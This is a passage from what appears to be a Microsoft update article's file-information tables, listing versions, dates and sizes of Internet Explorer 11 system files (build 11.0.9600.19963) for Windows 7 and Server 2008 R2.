\nMshtml.dll.mui| 11.0.9600.19963| 286,208| 14-Feb-21| 0:49 \nMshtml.dll.mui| 11.0.9600.19963| 281,600| 14-Feb-21| 0:50 \nMshtml.dll.mui| 11.0.9600.19963| 286,720| 14-Feb-21| 0:51 \nMshtml.dll.mui| 11.0.9600.19963| 292,352| 14-Feb-21| 0:52 \nMshtml.dll.mui| 11.0.9600.19963| 242,176| 14-Feb-21| 0:52 \nMshtml.dll.mui| 11.0.9600.19963| 243,200| 14-Feb-21| 0:53 \nMshtml.dll.mui| 11.0.9600.19963| 243,200| 14-Feb-21| 0:54 \nUrlmon.dll.mui| 11.0.9600.19963| 46,080| 14-Feb-21| 0:26 \nUrlmon.dll.mui| 11.0.9600.19963| 50,176| 14-Feb-21| 0:26 \nUrlmon.dll.mui| 11.0.9600.19963| 48,640| 14-Feb-21| 0:27 \nUrlmon.dll.mui| 11.0.9600.19963| 49,664| 14-Feb-21| 0:28 \nUrlmon.dll.mui| 11.0.9600.19963| 
51,712| 14-Feb-21| 0:29 \nUrlmon.dll.mui| 11.0.9600.19963| 54,272| 14-Feb-21| 0:30 \nUrlmon.dll.mui| 11.0.9600.19963| 48,128| 14-Feb-21| 2:00 \nUrlmon.dll.mui| 11.0.9600.19963| 50,176| 14-Feb-21| 0:31 \nUrlmon.dll.mui| 11.0.9600.19963| 47,616| 14-Feb-21| 0:32 \nUrlmon.dll.mui| 11.0.9600.19963| 49,152| 14-Feb-21| 0:32 \nUrlmon.dll.mui| 11.0.9600.19963| 50,688| 14-Feb-21| 0:33 \nUrlmon.dll.mui| 11.0.9600.19963| 45,056| 14-Feb-21| 0:34 \nUrlmon.dll.mui| 11.0.9600.19963| 49,152| 14-Feb-21| 0:36 \nUrlmon.dll.mui| 11.0.9600.19963| 49,664| 14-Feb-21| 0:36 \nUrlmon.dll.mui| 11.0.9600.19963| 39,936| 14-Feb-21| 0:37 \nUrlmon.dll.mui| 11.0.9600.19963| 39,424| 14-Feb-21| 0:38 \nUrlmon.dll.mui| 11.0.9600.19963| 47,616| 14-Feb-21| 0:39 \nUrlmon.dll.mui| 11.0.9600.19963| 47,616| 14-Feb-21| 0:40 \nUrlmon.dll.mui| 11.0.9600.19963| 48,640| 14-Feb-21| 0:41 \nUrlmon.dll.mui| 11.0.9600.19963| 51,200| 14-Feb-21| 0:42 \nUrlmon.dll.mui| 11.0.9600.19963| 50,688| 14-Feb-21| 0:43 \nUrlmon.dll.mui| 11.0.9600.19963| 49,664| 14-Feb-21| 0:43 \nUrlmon.dll.mui| 11.0.9600.19963| 50,176| 14-Feb-21| 0:44 \nUrlmon.dll.mui| 11.0.9600.19963| 49,152| 14-Feb-21| 0:45 \nUrlmon.dll.mui| 11.0.9600.19963| 48,640| 14-Feb-21| 0:46 \nUrlmon.dll.mui| 11.0.9600.19963| 50,176| 14-Feb-21| 0:47 \nUrlmon.dll.mui| 11.0.9600.19963| 48,640| 14-Feb-21| 0:47 \nUrlmon.dll.mui| 11.0.9600.19963| 49,664| 14-Feb-21| 0:48 \nUrlmon.dll.mui| 11.0.9600.19963| 48,640| 14-Feb-21| 0:49 \nUrlmon.dll.mui| 11.0.9600.19963| 48,128| 14-Feb-21| 0:50 \nUrlmon.dll.mui| 11.0.9600.19963| 49,152| 14-Feb-21| 0:51 \nUrlmon.dll.mui| 11.0.9600.19963| 48,128| 14-Feb-21| 0:51 \nUrlmon.dll.mui| 11.0.9600.19963| 35,328| 14-Feb-21| 0:52 \nUrlmon.dll.mui| 11.0.9600.19963| 35,328| 14-Feb-21| 0:53 \nUrlmon.dll.mui| 11.0.9600.19963| 35,328| 14-Feb-21| 0:54 \nJsproxy.dll| 11.0.9600.19963| 47,104| 13-Feb-21| 2:41 \nWininet.dll| 11.0.9600.19963| 4,388,352| 13-Feb-21| 1:53 \nInetcpl.cpl.mui| 11.0.9600.19963| 114,176| 14-Feb-21| 0:26 \nInetcpl.cpl.mui| 
11.0.9600.19963| 130,560| 14-Feb-21| 0:26 \nInetcpl.cpl.mui| 11.0.9600.19963| 124,928| 14-Feb-21| 0:27 \nInetcpl.cpl.mui| 11.0.9600.19963| 122,880| 14-Feb-21| 0:28 \nInetcpl.cpl.mui| 11.0.9600.19963| 130,048| 14-Feb-21| 0:29 \nInetcpl.cpl.mui| 11.0.9600.19963| 138,240| 14-Feb-21| 0:30 \nInetcpl.cpl.mui| 11.0.9600.19963| 114,688| 14-Feb-21| 2:00 \nInetcpl.cpl.mui| 11.0.9600.19963| 131,584| 14-Feb-21| 0:31 \nInetcpl.cpl.mui| 11.0.9600.19963| 117,760| 14-Feb-21| 0:32 \nInetcpl.cpl.mui| 11.0.9600.19963| 122,368| 14-Feb-21| 0:33 \nInetcpl.cpl.mui| 11.0.9600.19963| 134,144| 14-Feb-21| 0:33 \nInetcpl.cpl.mui| 11.0.9600.19963| 107,008| 14-Feb-21| 0:34 \nInetcpl.cpl.mui| 11.0.9600.19963| 123,392| 14-Feb-21| 0:35 \nInetcpl.cpl.mui| 11.0.9600.19963| 127,488| 14-Feb-21| 0:36 \nInetcpl.cpl.mui| 11.0.9600.19963| 128,512| 14-Feb-21| 0:37 \nInetcpl.cpl.mui| 11.0.9600.19963| 88,576| 14-Feb-21| 0:38 \nInetcpl.cpl.mui| 11.0.9600.19963| 82,944| 14-Feb-21| 0:39 \nInetcpl.cpl.mui| 11.0.9600.19963| 125,440| 14-Feb-21| 0:39 \nInetcpl.cpl.mui| 11.0.9600.19963| 123,392| 14-Feb-21| 0:40 \nInetcpl.cpl.mui| 11.0.9600.19963| 120,320| 14-Feb-21| 0:41 \nInetcpl.cpl.mui| 11.0.9600.19963| 130,560| 14-Feb-21| 0:42 \nInetcpl.cpl.mui| 11.0.9600.19963| 129,024| 14-Feb-21| 0:43 \nInetcpl.cpl.mui| 11.0.9600.19963| 125,952| 14-Feb-21| 0:44 \nInetcpl.cpl.mui| 11.0.9600.19963| 129,024| 14-Feb-21| 0:44 \nInetcpl.cpl.mui| 11.0.9600.19963| 128,000| 14-Feb-21| 0:45 \nInetcpl.cpl.mui| 11.0.9600.19963| 123,904| 14-Feb-21| 0:46 \nInetcpl.cpl.mui| 11.0.9600.19963| 129,024| 14-Feb-21| 0:47 \nInetcpl.cpl.mui| 11.0.9600.19963| 123,904| 14-Feb-21| 0:47 \nInetcpl.cpl.mui| 11.0.9600.19963| 124,416| 14-Feb-21| 0:49 \nInetcpl.cpl.mui| 11.0.9600.19963| 121,856| 14-Feb-21| 0:49 \nInetcpl.cpl.mui| 11.0.9600.19963| 115,712| 14-Feb-21| 0:50 \nInetcpl.cpl.mui| 11.0.9600.19963| 123,904| 14-Feb-21| 0:51 \nInetcpl.cpl.mui| 11.0.9600.19963| 125,440| 14-Feb-21| 0:51 \nInetcpl.cpl.mui| 11.0.9600.19963| 72,704| 14-Feb-21| 0:52 
\nInetcpl.cpl.mui| 11.0.9600.19963| 73,728| 14-Feb-21| 0:53 \nInetcpl.cpl.mui| 11.0.9600.19963| 73,728| 14-Feb-21| 0:54 \nMsfeedsbs.dll| 11.0.9600.19963| 52,736| 13-Feb-21| 2:21 \nMsfeedssync.exe| 11.0.9600.19963| 11,776| 13-Feb-21| 2:48 \nIeproxy.dll| 11.0.9600.19963| 310,784| 13-Feb-21| 1:45 \nIeshims.dll| 11.0.9600.19963| 290,304| 13-Feb-21| 1:51 \nIertutil.dll| 11.0.9600.19963| 2,308,096| 13-Feb-21| 2:44 \nSqmapi.dll| 6.2.9200.16384| 228,256| 14-Feb-21| 0:24 \nIeframe.dll.mui| 11.0.9600.19963| 2,066,432| 14-Feb-21| 0:26 \nIeframe.dll.mui| 11.0.9600.19963| 2,121,216| 14-Feb-21| 0:27 \nIeframe.dll.mui| 11.0.9600.19963| 2,075,136| 14-Feb-21| 0:28 \nIeframe.dll.mui| 11.0.9600.19963| 2,063,872| 14-Feb-21| 0:29 \nIeframe.dll.mui| 11.0.9600.19963| 2,314,240| 14-Feb-21| 0:29 \nIeframe.dll.mui| 11.0.9600.19963| 2,390,528| 14-Feb-21| 0:30 \nIeframe.dll.mui| 11.0.9600.19963| 2,033,152| 14-Feb-21| 2:00 \nIeframe.dll.mui| 11.0.9600.19963| 2,307,584| 14-Feb-21| 0:31 \nIeframe.dll.mui| 11.0.9600.19963| 2,255,872| 14-Feb-21| 0:32 \nIeframe.dll.mui| 11.0.9600.19963| 2,061,312| 14-Feb-21| 0:33 \nIeframe.dll.mui| 11.0.9600.19963| 2,326,016| 14-Feb-21| 0:34 \nIeframe.dll.mui| 11.0.9600.19963| 2,019,840| 14-Feb-21| 0:35 \nIeframe.dll.mui| 11.0.9600.19963| 2,071,040| 14-Feb-21| 0:35 \nIeframe.dll.mui| 11.0.9600.19963| 2,082,816| 14-Feb-21| 0:36 \nIeframe.dll.mui| 11.0.9600.19963| 2,307,584| 14-Feb-21| 0:37 \nIeframe.dll.mui| 11.0.9600.19963| 2,170,368| 14-Feb-21| 0:38 \nIeframe.dll.mui| 11.0.9600.19963| 2,153,984| 14-Feb-21| 0:39 \nIeframe.dll.mui| 11.0.9600.19963| 2,291,712| 14-Feb-21| 0:40 \nIeframe.dll.mui| 11.0.9600.19963| 2,283,520| 14-Feb-21| 0:40 \nIeframe.dll.mui| 11.0.9600.19963| 2,052,096| 14-Feb-21| 0:41 \nIeframe.dll.mui| 11.0.9600.19963| 2,301,952| 14-Feb-21| 0:42 \nIeframe.dll.mui| 11.0.9600.19963| 2,093,056| 14-Feb-21| 0:43 \nIeframe.dll.mui| 11.0.9600.19963| 2,075,648| 14-Feb-21| 0:44 \nIeframe.dll.mui| 11.0.9600.19963| 2,299,392| 14-Feb-21| 0:45 \nIeframe.dll.mui| 
11.0.9600.19963| 2,094,592| 14-Feb-21| 0:45 \nIeframe.dll.mui| 11.0.9600.19963| 2,316,800| 14-Feb-21| 0:46 \nIeframe.dll.mui| 11.0.9600.19963| 2,305,536| 14-Feb-21| 0:47 \nIeframe.dll.mui| 11.0.9600.19963| 2,278,912| 14-Feb-21| 0:48 \nIeframe.dll.mui| 11.0.9600.19963| 2,277,888| 14-Feb-21| 0:48 \nIeframe.dll.mui| 11.0.9600.19963| 2,060,288| 14-Feb-21| 0:49 \nIeframe.dll.mui| 11.0.9600.19963| 2,315,776| 14-Feb-21| 0:50 \nIeframe.dll.mui| 11.0.9600.19963| 2,278,912| 14-Feb-21| 0:51 \nIeframe.dll.mui| 11.0.9600.19963| 2,324,992| 14-Feb-21| 0:52 \nIeframe.dll.mui| 11.0.9600.19963| 2,098,176| 14-Feb-21| 0:53 \nIeframe.dll.mui| 11.0.9600.19963| 1,890,304| 14-Feb-21| 0:54 \nIeframe.dll.mui| 11.0.9600.19963| 1,890,304| 14-Feb-21| 0:55 \nJscript9.dll.mui| 11.0.9600.19963| 29,184| 14-Feb-21| 0:26 \nJscript9.dll.mui| 11.0.9600.19963| 29,696| 14-Feb-21| 0:26 \nJscript9.dll.mui| 11.0.9600.19963| 32,768| 14-Feb-21| 0:27 \nJscript9.dll.mui| 11.0.9600.19963| 33,280| 14-Feb-21| 0:28 \nJscript9.dll.mui| 11.0.9600.19963| 35,328| 14-Feb-21| 0:29 \nJscript9.dll.mui| 11.0.9600.19963| 37,888| 14-Feb-21| 0:30 \nJscript9.dll.mui| 11.0.9600.19963| 29,696| 14-Feb-21| 2:00 \nJscript9.dll.mui| 11.0.9600.19963| 34,304| 14-Feb-21| 0:31 \nJscript9.dll.mui| 11.0.9600.19963| 29,696| 14-Feb-21| 0:31 \nJscript9.dll.mui| 11.0.9600.19963| 33,280| 14-Feb-21| 0:32 \nJscript9.dll.mui| 11.0.9600.19963| 34,304| 14-Feb-21| 0:33 \nJscript9.dll.mui| 11.0.9600.19963| 27,648| 14-Feb-21| 0:34 \nJscript9.dll.mui| 11.0.9600.19963| 29,696| 14-Feb-21| 0:35 \nJscript9.dll.mui| 11.0.9600.19963| 34,304| 14-Feb-21| 0:36 \nJscript9.dll.mui| 11.0.9600.19963| 33,792| 14-Feb-21| 0:36 \nJscript9.dll.mui| 11.0.9600.19963| 23,040| 14-Feb-21| 0:38 \nJscript9.dll.mui| 11.0.9600.19963| 22,016| 14-Feb-21| 0:39 \nJscript9.dll.mui| 11.0.9600.19963| 29,696| 14-Feb-21| 0:39 \nJscript9.dll.mui| 11.0.9600.19963| 29,696| 14-Feb-21| 0:40 \nJscript9.dll.mui| 11.0.9600.19963| 31,232| 14-Feb-21| 0:41 \nJscript9.dll.mui| 11.0.9600.19963| 
34,304| 14-Feb-21| 0:42 \nJscript9.dll.mui| 11.0.9600.19963| 35,840| 14-Feb-21| 0:42 \nJscript9.dll.mui| 11.0.9600.19963| 32,768| 14-Feb-21| 0:43 \nJscript9.dll.mui| 11.0.9600.19963| 33,280| 14-Feb-21| 0:45 \nJscript9.dll.mui| 11.0.9600.19963| 29,696| 14-Feb-21| 0:45 \nJscript9.dll.mui| 11.0.9600.19963| 34,816| 14-Feb-21| 0:46 \nJscript9.dll.mui| 11.0.9600.19963| 33,280| 14-Feb-21| 0:47 \nJscript9.dll.mui| 11.0.9600.19963| 32,256| 14-Feb-21| 0:47 \nJscript9.dll.mui| 11.0.9600.19963| 29,696| 14-Feb-21| 0:48 \nJscript9.dll.mui| 11.0.9600.19963| 32,768| 14-Feb-21| 0:49 \nJscript9.dll.mui| 11.0.9600.19963| 29,696| 14-Feb-21| 0:50 \nJscript9.dll.mui| 11.0.9600.19963| 30,720| 14-Feb-21| 0:51 \nJscript9.dll.mui| 11.0.9600.19963| 29,696| 14-Feb-21| 0:51 \nJscript9.dll.mui| 11.0.9600.19963| 16,384| 14-Feb-21| 0:52 \nJscript9.dll.mui| 11.0.9600.19963| 16,896| 14-Feb-21| 0:53 \nJscript9.dll.mui| 11.0.9600.19963| 16,896| 14-Feb-21| 0:54 \n \n### **Windows 7 and Windows Server 2008 R2**\n\n### \n\n__\n\nInternet Explorer 11 on all supported x86-based versions\n\n**File name**| **File version**| **Date**| **Time**| **File size** \n---|---|---|---|--- \nurlmon.dll| 11.0.9600.19963| 12-Feb-2021| 17:50| 1,343,488 \niexplore.exe| 11.0.9600.19963| 13-Feb-2021| 11:46| 810,376 \nwebcheck.dll.mui| 11.0.9600.19963| 13-Feb-2021| 11:47| 31,744 \nwebcheck.dll.mui| 11.0.9600.19963| 13-Feb-2021| 11:48| 36,352 \nwebcheck.dll.mui| 11.0.9600.19963| 13-Feb-2021| 11:49| 35,328 \nwebcheck.dll.mui| 11.0.9600.19963| 13-Feb-2021| 11:50| 34,816 \nwebcheck.dll.mui| 11.0.9600.19963| 13-Feb-2021| 11:51| 36,864 \nwebcheck.dll.mui| 11.0.9600.19963| 13-Feb-2021| 11:51| 39,424 \nwebcheck.dll.mui| 11.0.9600.19963| 13-Feb-2021| 13:20| 32,768 \nwebcheck.dll.mui| 11.0.9600.19963| 13-Feb-2021| 11:52| 37,376 \nwebcheck.dll.mui| 11.0.9600.19963| 13-Feb-2021| 11:53| 33,280 \nwebcheck.dll.mui| 11.0.9600.19963| 13-Feb-2021| 11:54| 34,816 \nwebcheck.dll.mui| 11.0.9600.19963| 13-Feb-2021| 11:55| 38,400 
\nwebcheck.dll.mui| 11.0.9600.19963| 13-Feb-2021| 11:56| 30,720 \nwebcheck.dll.mui| 11.0.9600.19963| 13-Feb-2021| 11:57| 34,816 \nwebcheck.dll.mui| 11.0.9600.19963| 13-Feb-2021| 11:57| 35,328 \nwebcheck.dll.mui| 11.0.9600.19963| 13-Feb-2021| 11:59| 36,864 \nwebcheck.dll.mui| 11.0.9600.19963| 13-Feb-2021| 11:59| 25,600 \nwebcheck.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:00| 24,576 \nwebcheck.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:01| 35,840 \nwebcheck.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:01| 34,304 \nwebcheck.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:02| 34,304 \nwebcheck.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:04| 36,352 \nwebcheck.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:04| 35,840 \nwebcheck.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:05| 34,816 \nwebcheck.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:06| 35,840 \nwebcheck.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:06| 35,840 \nwebcheck.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:07| 34,304 \nwebcheck.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:09| 35,840 \nwebcheck.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:09| 34,816 \nwebcheck.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:10| 34,816 \nwebcheck.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:10| 34,816 \nwebcheck.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:12| 33,280 \nwebcheck.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:12| 34,304 \nwebcheck.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:13| 34,304 \nwebcheck.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:14| 20,992 \nwebcheck.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:15| 21,504 \nwebcheck.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:15| 21,504 \nwininet.dll.mui| 11.0.9600.19963| 13-Feb-2021| 11:47| 46,592 \nwininet.dll.mui| 11.0.9600.19963| 13-Feb-2021| 11:48| 52,736 \nwininet.dll.mui| 11.0.9600.19963| 13-Feb-2021| 11:49| 51,200 \nwininet.dll.mui| 11.0.9600.19963| 13-Feb-2021| 11:50| 51,200 \nwininet.dll.mui| 11.0.9600.19963| 13-Feb-2021| 11:50| 56,320 \nwininet.dll.mui| 11.0.9600.19963| 13-Feb-2021| 11:51| 57,856 \nwininet.dll.mui| 
11.0.9600.19963| 13-Feb-2021| 13:20| 49,664 \nwininet.dll.mui| 11.0.9600.19963| 13-Feb-2021| 11:53| 54,272 \nwininet.dll.mui| 11.0.9600.19963| 13-Feb-2021| 11:53| 47,616 \nwininet.dll.mui| 11.0.9600.19963| 13-Feb-2021| 11:54| 49,152 \nwininet.dll.mui| 11.0.9600.19963| 13-Feb-2021| 11:55| 55,296 \nwininet.dll.mui| 11.0.9600.19963| 13-Feb-2021| 11:56| 45,056 \nwininet.dll.mui| 11.0.9600.19963| 13-Feb-2021| 11:57| 51,712 \nwininet.dll.mui| 11.0.9600.19963| 13-Feb-2021| 11:57| 51,712 \nwininet.dll.mui| 11.0.9600.19963| 13-Feb-2021| 11:58| 53,248 \nwininet.dll.mui| 11.0.9600.19963| 13-Feb-2021| 11:59| 39,424 \nwininet.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:00| 35,840 \nwininet.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:01| 50,176 \nwininet.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:02| 51,200 \nwininet.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:02| 50,688 \nwininet.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:03| 52,736 \nwininet.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:04| 53,760 \nwininet.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:05| 54,272 \nwininet.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:06| 54,272 \nwininet.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:07| 52,736 \nwininet.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:07| 51,200 \nwininet.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:08| 53,248 \nwininet.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:09| 52,736 \nwininet.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:10| 51,712 \nwininet.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:11| 50,688 \nwininet.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:11| 50,688 \nwininet.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:12| 50,176 \nwininet.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:13| 50,176 \nwininet.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:14| 30,720 \nwininet.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:15| 30,720 \nwininet.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:15| 30,720 \ninetcpl.cpl| 11.0.9600.19963| 12-Feb-2021| 18:12| 2,058,752 \nDiagnosticsTap.dll.mui| 11.0.9600.19963| 13-Feb-2021| 11:47| 
10,752 \nDiagnosticsTap.dll.mui| 11.0.9600.19963| 13-Feb-2021| 11:48| 10,752 \nDiagnosticsTap.dll.mui| 11.0.9600.19963| 13-Feb-2021| 11:49| 10,752 \nDiagnosticsTap.dll.mui| 11.0.9600.19963| 13-Feb-2021| 11:50| 10,752 \nDiagnosticsTap.dll.mui| 11.0.9600.19963| 13-Feb-2021| 11:51| 10,752 \nDiagnosticsTap.dll.mui| 11.0.9600.19963| 13-Feb-2021| 11:51| 10,752 \nDiagnosticsTap.dll.mui| 11.0.9600.19963| 13-Feb-2021| 13:20| 10,752 \nDiagnosticsTap.dll.mui| 11.0.9600.19963| 13-Feb-2021| 11:52| 10,752 \nDiagnosticsTap.dll.mui| 11.0.9600.19963| 13-Feb-2021| 11:53| 10,752 \nDiagnosticsTap.dll.mui| 11.0.9600.19963| 13-Feb-2021| 11:54| 10,752 \nDiagnosticsTap.dll.mui| 11.0.9600.19963| 13-Feb-2021| 11:55| 10,752 \nDiagnosticsTap.dll.mui| 11.0.9600.19963| 13-Feb-2021| 11:56| 10,752 \nDiagnosticsTap.dll.mui| 11.0.9600.19963| 13-Feb-2021| 11:56| 10,752 \nDiagnosticsTap.dll.mui| 11.0.9600.19963| 13-Feb-2021| 11:57| 10,752 \nDiagnosticsTap.dll.mui| 11.0.9600.19963| 13-Feb-2021| 11:58| 10,752 \nDiagnosticsTap.dll.mui| 11.0.9600.19963| 13-Feb-2021| 11:59| 10,752 \nDiagnosticsTap.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:00| 10,752 \nDiagnosticsTap.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:01| 10,752 \nDiagnosticsTap.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:02| 10,752 \nDiagnosticsTap.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:02| 10,752 \nDiagnosticsTap.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:03| 10,752 \nDiagnosticsTap.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:04| 10,752 \nDiagnosticsTap.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:05| 10,752 \nDiagnosticsTap.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:06| 10,752 \nDiagnosticsTap.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:06| 10,752 \nDiagnosticsTap.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:07| 10,752 \nDiagnosticsTap.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:09| 10,752 \nDiagnosticsTap.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:09| 10,752 \nDiagnosticsTap.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:10| 10,752 \nDiagnosticsTap.dll.mui| 
### Internet Explorer 11 on all supported x64-based versions
13-Feb-2021| 13:11| 65,536 \nF12Resources.dll.mui| 11.0.9600.19963| 13-Feb-2021| 13:11| 69,120 \nF12Resources.dll.mui| 11.0.9600.19963| 13-Feb-2021| 13:12| 29,696 \nF12Resources.dll.mui| 11.0.9600.19963| 13-Feb-2021| 13:13| 30,720 \nF12Resources.dll.mui| 11.0.9600.19963| 13-Feb-2021| 13:14| 30,720 \nJavaScriptCollectionAgent.dll| 11.0.9600.19963| 12-Feb-2021| 18:47| 77,824 \nDiagnosticsHub.ScriptedSandboxPlugin.dll| 11.0.9600.19963| 12-Feb-2021| 18:49| 276,480 \nurlmon.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:46| 46,080 \nurlmon.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:47| 50,176 \nurlmon.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:48| 48,640 \nurlmon.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:49| 49,664 \nurlmon.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:50| 51,712 \nurlmon.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:50| 54,272 \nurlmon.dll.mui| 11.0.9600.19963| 13-Feb-2021| 13:48| 48,128 \nurlmon.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:52| 50,176 \nurlmon.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:52| 47,616 \nurlmon.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:53| 49,152 \nurlmon.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:53| 50,688 \nurlmon.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:54| 45,056 \nurlmon.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:55| 49,152 \nurlmon.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:56| 49,152 \nurlmon.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:57| 49,664 \nurlmon.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:58| 39,936 \nurlmon.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:59| 39,424 \nurlmon.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:59| 47,616 \nurlmon.dll.mui| 11.0.9600.19963| 13-Feb-2021| 13:00| 47,616 \nurlmon.dll.mui| 11.0.9600.19963| 13-Feb-2021| 13:01| 48,640 \nurlmon.dll.mui| 11.0.9600.19963| 13-Feb-2021| 13:02| 51,200 \nurlmon.dll.mui| 11.0.9600.19963| 13-Feb-2021| 13:03| 50,688 \nurlmon.dll.mui| 11.0.9600.19963| 13-Feb-2021| 13:03| 49,664 \nurlmon.dll.mui| 11.0.9600.19963| 13-Feb-2021| 13:04| 50,176 \nurlmon.dll.mui| 11.0.9600.19963| 
13-Feb-2021| 13:05| 49,152 \nurlmon.dll.mui| 11.0.9600.19963| 13-Feb-2021| 13:06| 48,640 \nurlmon.dll.mui| 11.0.9600.19963| 13-Feb-2021| 13:07| 50,176 \nurlmon.dll.mui| 11.0.9600.19963| 13-Feb-2021| 13:07| 48,640 \nurlmon.dll.mui| 11.0.9600.19963| 13-Feb-2021| 13:08| 49,664 \nurlmon.dll.mui| 11.0.9600.19963| 13-Feb-2021| 13:09| 48,640 \nurlmon.dll.mui| 11.0.9600.19963| 13-Feb-2021| 13:10| 48,128 \nurlmon.dll.mui| 11.0.9600.19963| 13-Feb-2021| 13:10| 49,152 \nurlmon.dll.mui| 11.0.9600.19963| 13-Feb-2021| 13:11| 48,128 \nurlmon.dll.mui| 11.0.9600.19963| 13-Feb-2021| 13:12| 35,328 \nurlmon.dll.mui| 11.0.9600.19963| 13-Feb-2021| 13:13| 35,328 \nurlmon.dll.mui| 11.0.9600.19963| 13-Feb-2021| 13:14| 35,328 \noccache.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:47| 9,728 \noccache.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:47| 10,752 \noccache.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:48| 10,240 \noccache.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:49| 9,728 \noccache.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:49| 10,752 \noccache.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:50| 11,264 \noccache.dll.mui| 11.0.9600.19963| 13-Feb-2021| 13:47| 9,728 \noccache.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:52| 10,752 \noccache.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:52| 10,240 \noccache.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:53| 10,240 \noccache.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:53| 10,752 \noccache.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:54| 9,216 \noccache.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:55| 10,240 \noccache.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:56| 10,240 \noccache.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:57| 10,752 \noccache.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:58| 7,680 \noccache.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:59| 7,680 \noccache.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:59| 10,240 \noccache.dll.mui| 11.0.9600.19963| 13-Feb-2021| 13:01| 10,240 \noccache.dll.mui| 11.0.9600.19963| 13-Feb-2021| 13:01| 9,728 \noccache.dll.mui| 11.0.9600.19963| 
